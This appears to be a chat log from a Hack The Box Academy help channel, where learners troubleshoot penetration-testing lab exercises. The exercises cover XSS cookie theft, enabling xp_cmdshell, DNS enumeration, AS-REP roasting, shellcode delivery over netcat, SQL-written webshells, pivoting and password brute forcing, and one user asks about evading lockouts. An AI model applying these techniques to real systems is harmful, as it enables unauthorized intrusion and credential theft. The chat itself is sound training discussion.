I have placed the XSS for the cookie logger script in the julie profile and it doesn't get accessed by any admin or anything
why can't I enable xp_cmdshell
I'm in the hard lab of Attacking common services
did literally everything, linked to another database where I have admin privilege but can't execute xp_cmdshell and when I try to enable it through sp_configure I get an error
your single quotes are messing you up
you need to break it up with double quotes
things that are seen in the quotes 'sp_configure ' ', 1'
iirc there was an open redirect vuln in the assessment
and the admin cookie could be accessed by xss due to lack of httponly protection
just figured it out before I read your help, I reread the whole attacking database section
thanks tho
np; sometimes asking the question helps you understand where you fucked up
bro thats sooooo trueeeeeee hahahaa
especially since you're rephrasing the problem in your own words
it's a good strategy for learning things too ¯_(ツ)_/¯
read about x, knowing also about y
can I also do y with x?
don't see why not
yes that's true, when you start questioning things and take a few steps back you find the solution :3
yep especially if you can ask "Does this make sense"
I can now sleep, it's 3am in my country lul
stuck in "attacking dns" - attacking common services. I added my "<target ip> inlanefreight.htb" to the /etc/hosts file. I can ping, nmap, they both give me feedback, especially with seeing p53 is open. running nslookup or dig against inlanefreight.htb gives me zero records
also tried subbrute against inlanefreight.htb and it can't find anything
the question specifically asks me to run against inlanefreight.htb, however if I use the examples used in the read-up like inlanefreight.com.. those do fetch results. is this thing messed up or am I missing something?
You're missing something
Since .htb isn't an official tld you still need to specify a query server
Inlanefreight.com is a real website that's used in some engagements, which is why it works
I.e. with nslookup you'd specify the ip as the lookup
nslookup -type=ns inlanefreight.htb $target_ip
nslookup and similar tools query using public nameservers
Subbrute is absolutely the right next step, you just have to provide it the right nameserver to query
If nslookup gives you a loopback, then it's safe to assume the nameserver it gives you is the same ip
Stuck on Attacking network Enterprise
I am having a strange problem: the nmap binary is not working over ssh as in the image
can anyone help...??
Looks like it's empty
aah....
Need to do the entire process again...
This is why doing some checksum verification is useful when doing file transfers
😓
figured out why I wasn't getting anything. removed the /etc/hosts entry I mentioned earlier. now when I run "dig inlanefreight.htb any @<target ip>" I get a name server.. the name server has a loopback. does that mean the name server's IP is the same as the <target ip>?
Correct. (You can also just put the ip in the resolvers.txt for subbrute)
nice, making progress now. thanks
btw discord has a search feature where you can search and see if people have asked a similar question to yours
;) I can guarantee you're not the first person to ask
What defines the functions our objects have?
Does anyone want to help me, to tell what the answer is, I've spent 2 hours and only get errors. Help me
It helps if you specify what module you're working on and what errors you might be getting
hello
I worked on the module Information Security Foundation >> Introduction to Windows Command Line >> first question
You could say that
I'm asking you
You're the one actually looking at the module and section you're working on lol
I can't help narrow down where you're fucking up if you don't help me know where you're at
"First question" doesn't necessarily help
If it is that section it's just the folder name, not the filepath
Hi guys, I need help with the Using Web Proxies module, can someone help me pls
Can anyone gift me 550 - 600 academy cubes to complete my desired module? I am very eager to learn from HTB Academy. It will be very helpful for me. Or is there any way to earn this amount of cubes except by referring? Because I've already referred enough of my known persons.
You can just buy them
Or if you're a uni student with a uni email, the student discount is pretty good
you gotta look more into how the referral works, you only get a tiny portion if someone signs up for a subscription ¯_(ツ)_/¯
You're not gonna have a sustainable amount off referrals
for now, I don't have the opportunity to buy. I am a jobless person and I don't have any payment option from Bangladesh (my country), international card or anything like that.
Then you're just gonna have to be patient brother, htb occasionally does giveaways if you check in on their socials
You can compete in the upcoming ctf where you have a chance to subscriptions on Academy as well - https://www.hackthebox.com/events/cyber-apocalypse-2024
is it for advanced or just beginner stuff?
Thanks for the info. I will be patient. But nowadays, I don't see any giveaway. The last giveaway I saw was on the HTB birthday anniversary. I was trying hard to decode the Python code they gave, but I failed that day. But I was a little far from getting the giveaway. That was the sad moment.
I believe it caters for all levels from beginner to advanced
Can anyone confirm if kerbrute has stopped automatically asreproasting pre auth disabled users?
cause I'm lost rn
the hashes from kerbrute can't be cracked, has been broken for a while
I need help for the Burp Intruder Section and Repeating Requests section
I'm sorry, could you explain more
I recall running the tool in the academy labs a couple months back and got hashes but rn doing a box and it didnt, making me completely ignore a potential foothold vector 💀
is it a problem from the tool or what?
as in don't use kerbrute for anything other than bruting, for kerberoast and asreproast use something else
from my testing yeah
they can be cracked if you use nxc or impacket
the last time I tried doing it, it was fine
maybe some updates
not sure but I'm not the only one that ran into that
I am just a noob. I don't have enough knowledge to be in the top 10.
Can confirm
Everything from very easy - advanced
neither do I
don't forget that the best challenge writeup can win a playstation 5
It comes with a 12 year shipping delay 
if you tell me where you have problems maybe i could help
no that's the worst prize, if I get a ps5 no more studying lol
same
I followed each step but it's not working, I don't find the answer
Thanks, the question has been adjusted
Please do not post any spoilers (answers)
what steps are you talking about
When I do the command injection I don't find the path in the section "Repeating Requests"
Module: Windows Fundamentals (Windows Services & Processes)
How do I resolve this issue? I've already tried resetting the pwnbox and target machine.
┌─[eu-academy-1]─[10.10.14.184]─[htb-ac-773541@htb-za5ahfa6ou]─[~]
└──╼ [★]$ xfreerdp /v:10.129.120.207 /u:htb-student /p:Academy_WinFun!
[10:57:36:758] [2499:2500] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:57:36:758] [2499:2500] [ERROR][com.freerdp.core] - failed to connect to 10.129.120.207
Hello guys i need help
Module: Shell and Payloads
Section: Anatomy of a shell
Question: "Which two shell languages did we experiment with in this section? (Format: shellname&shellname)"
I extracted the information with the env command, but I could not find the correct format.
thx for help
try with single quote /p:'password'
Wrap password in single quotes
It worked. I swear I tried it earlier and it didn't work 😂
Thanks
hahahahahah that happens all the time
Same module, I'm having trouble with the question
Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.
Do I find this in Task Manager?
maybe, I don't remember
the question asked for within the section itself
any1 facing problems with slow labs?
yeap but I don't find the true format
dm ur answer
works fine for me
maybe I need to switch vpn
why is the vm of priv esc (sudo) so slow
yes me
The bash script modules in the Information Security path are driving me crazy. I feel like the material isn't preparing me to write the scripts to answer the questions.
Little help from Attacking Network Enterprise
Anyone ligolo expert here
trying to run commands as per the github repo but this strange error!!!!
Can anyone help???
you use the wrong subnet
the problem is not from ligolo, you can't have x.x.8.0/16, it's just not possible
just use the subnet from the module
I put .0 because I want to access all others from those 172.16.8.X/16
from one of the tutorials of John Hammond
the problem is /16
it depends on the subnet
use /23
ok
if you have an idea abt subnetting you will know why this is not possible
aah got it
I used /24 and it worked
Thanks @limber river
sometimes yt tutorials show things in such a way that everything is just magic
why is the HTB vpn not connecting even when I'm not connecting to the server in maintenance, is this only happening to me or are all the servers down??
most YouTube channels, they just pretend to hack in front of you, they don't teach how stuff works
hey @limber river just want to ask one thing
My head is not working but need to complete this thing
Now as I can do scans etc etc on 172.16.8.50, say
How to visit this 172.16.8.50 in firefox?
It gives connection failed
you can ping it?
oohhh ohh worked..!!
congrats, still having an issue with PE on the initial access, idk why it's not working lol
sometimes i make some unexpected mistakes
anyway thanks for the support
bro you just spoiled on me accidentally xd
I am doing ping sweep now on the same lab
imho you're done with the path, these are the issues you're expected to figure out yourself
who's gonna help you in the exam?
Hello Yall✌
I know you speak hard, and that's for good
But I am human, bound to make mistakes and learn from them. Sometimes figuring out mistakes becomes difficult unless someone who went through this gives a little nudge.
he just wants to tell you to rely on yourself so you can improve ur skills
So I've noticed with some of these they give me a vpn code thing that you download but I'm not sure what it is/what I do with it
we all make mistakes, in fact we can't learn without them
I didn't say you can't make mistakes, I'm saying that you're expected to find out what went wrong yourself. nobody is gonna give you a nudge in the exam. or in an actual pentest
@next bronze @limber river
Got your point
and there's also the type of question being asked, if it's something complex and not immediately obvious, sure that's fine. but for basic questions, like in this case basic subnetting, the error itself is already a big hint you can work on
I always blame myself, when I ask abt a hint and figure out it's too obvious
Thanks @next bronze @limber river for the suggestions
Will work on it..!
So I feel like if I want to do this for a job I'd want to use linux
Even tho I love windows
Maybe I could install a vm and dual boot
Is that even possible?
for pentesting, most people use linux. you don't need to dual boot if you're running a vm
yep, that's also what most people do
if you're doing academy, the getting started module walks you through it
172.16.0.0/16 would work or 172.16.8.0/24
if you want to reach 172.16.9.10 then you can't reach that with your /24 notation
Hey, I am procrastinating on completing my module in HTB. Can anyone please suggest anything to fix it
Do a marriage proposal to MarcieLee and if you get friendzoned you'll have the energy to continue
Hey everyone I'm having trouble with this question in the IDS/IPS module: There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword]; Can someone point me in the right direction? I was able to make snort trigger alerts on the traffic but so far no luck on the answers to the question. Thanks in advance
Did you inspect the rule yet? If so, did you open the pcap in wireshark and find that pattern it's looking for inside the pcap?
I have
great, think about what container it's under
Format <word1>_<word2>
I found the user-agent specified in the rule. and i tried multiple specific options to trigger the rule. but no luck
Think about what container/compartment all that data would be in: request method, URI, request version, user-agent, etc..
May I dm?
yes go ahead
Hey guyz
I'm doing Attacking Common Web Application in htb academy
But I have a weird problem about the splunk section
└──╼ $ sudo nmap -sV 10.129.223.73
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 16:47 CET
Nmap scan report for 10.129.223.73
Host is up (0.044s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
8000/tcp open ssl/http Splunkd httpd
8080/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
8089/tcp open ssl/http Splunkd httpd
I got splunk opened port
But neither opening chrome with 10.129.223.73:8000 nor 10.129.223.73:8089 works
I then tried to curl it
┌─[✗]─[user@parrot]─[~/Desktop/HTB/Course/AttackingCommonApplication]
└──╼ $curl http://10.129.223.73:8000
curl: (52) Empty reply from server
┌─[✗]─[user@parrot]─[~/Desktop/HTB/Course/AttackingCommonApplication]
└──╼ $curl http://10.129.223.73:8089
curl: (52) Empty reply from server
what linux version would be recommended for a bug bounty hunter
Or does it not entirely matter
I'm not too sure, I'm downloading a vm so
Depends, are you following the HTB bounty hunter program?
so I am currently on linux fundamentals at the editing files part, however I seem to not be able to use nano properly, even when full screening the workstation, the key combinations needed for certain actions are either not working properly and don't do anything, or open new browser tabs, does this have to do with the browser I am using? would using chrome for example fix the issue? or could it have to do with my OS? I use linux mint. if anyone has any ideas on what could be causing this please tell me
Doesn't entirely matter
If you're looking to specialize in reversing and stuff like that I believe there's a distro: REMNux
hi guys, currently I am studying the linux privilege escalation and I have studied up to the Special Permissions section of the module. When doing the question of the topic I already have the answer based on the hints of the discussion forum, but it leads to one confusion:
what does the question mean, especially the section command output (Find a file with the setuid bit set that was not shown in the section command output)
how do we determine the binary with the signature instead of trying to input the file paths one by one as the forum discusses
Thank you for the time
Working on it
I’ll look into it then
hello guys, currently I'm doing the introduction to assembly language and I am unable to understand how to get the flag in the question
The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the server with "nc SERVER_IP PORT" to send the shellcode.
I'm unsure how to use netcat to run the shellcode.
connect to the target using nc, paste the shellcode, enter
only the hex and nothing more?
yes
I have tried pasting the hex for /bin/sh but it gave me "failed to run shellcode!"
that's not what the question asked for
isn't the shellcode the hex value you generate using shellcraft?
yes but why sh? the question asked for
shellcode that prints the content of '/flag.txt'
the hint suggested /bin/cat/flag.txt
so is the shellcraft path=/bin/cat and argv = ['flag.txt']?
I tried the above as the path and arg but it didn't work
what's the path to flag.txt?
the hint says "/bin/cat/flag.txt"
I mean shellcraft is not the only tool you can use
does using a different tool change the shellcode you get?
it worked finally. using msfvenom helped. Thanks for the suggestion! I had been stuck on this question for way too long. That suggestion helped
technical issues with a SOC module here: PKI-ESC1
cannot connect to WS001 from kali, error message: trust relationship between this workstation and the primary domain failed.
any ideas? cannot practice the techniques shown in this module and solve the questions.
do different versions of kerbrute have different syntax? I've tried all the suggestions and followed -h and still can't get it to run
did you install the right kerbrute? it doesn't use the impacket libraries afaik
Hey guyz
I tried to connect to gitlab in attacking common application
I found username to connect with
But cannot get the password
And they say in the course that after 10 tries the account is locked for 10 minutes
So bruteforce doesn't seem to be an option
You're trying to RDP from within the Kali target right? I never had this issue, only things I can think of is give the environment time to load, if that doesn't work, maybe switch vpn server/pwnbox region
Can someone help me with this?
Module: Advanced Xss and CSRF Exploitation
Section: Bypassing CSRF Tokens via CORS Misconfigurations
I am not able to get a working payload
Hi man, I have tried that Cypher query and it doesn't work
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
Does anyone have Kira's password?
Been slamming my head against a wall looking for it hahah
thanks! it seems to work on another VPN region
You have to get it by creating a mutated list of passwords, using the custom rule in the resources, and use that list with hydra
I tried this!
several times haha
I apparently already cracked this password, it is making me use it for another module, so I went back to look and it's not an answer for any of the previous questions.
If someone could DM me the password that would be great.. Its not for a lab completion.. just to start the lab..
Can someone tell me how the following question has anything to do with Burp or ZAP? I got the flag by enabling it directly from within the browser but not with burp or ZAP?
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
This is in the Web Proxies module, under the Skills Assessment exercise
Because you can do it with Burp or ZAP
I tried, I cannot manipulate the HTML code within either application
you can intercept the response in burp and enable the button
I tried that. It shows me the disabled button, but all I can do is look at it
It won't let me change anything
dm me, your dms are blocked
you can modify the HTML in the response to enable the button
cuteeee
So you're telling me all I have to do is manipulate the code within the response tab to enable the button? Because I am physically trying as we speak and it will not take any of my input
All I can do is look at the response tab
let's go, almost done with the no-threshold challenge but I need to learn brute forcing and IP changing, anyone able to suggest me a module about IP changing and stuff that can evade too many attempts?
Am I doing something wrong?
how are you enabling the button in the browser
By manipulating the HTML code with inspect
you can manipulate the HTML code within burp by intercepting server response
weird, dm me
burp doesn't intercept the response by default, you need to enable it in proxy settings
???
Yeah I guess so
has anyone been able to reach htb support? sent two emails no reply and nothing from the live chat either
Hello
who did this and can tell me which service I should authenticate with the credentials I have? Because I tried them all
Thanks @quiet ember helped me out with it haha
Have a little patience. Support works as fast as it can
Please do not post any spoilers
Read the module again. It explains how you can write a file with SQL
my bad
no problem
going through the sql module under attacking common services but it doesn't go over webshells. I guess I'm just more curious how people figured out what shell to generate using the rev shell site
The point is that you can write a file. Since a web server is running which can execute PHP, you can write a webshell
is there a specific passage i can reference in HTB academy? I really want to understand this.
If I do a module that costs 500 and I only get 100 back. What happens when i run out of cubes?
If you don’t have cubes you can’t unlock other modules🤷🏼♂️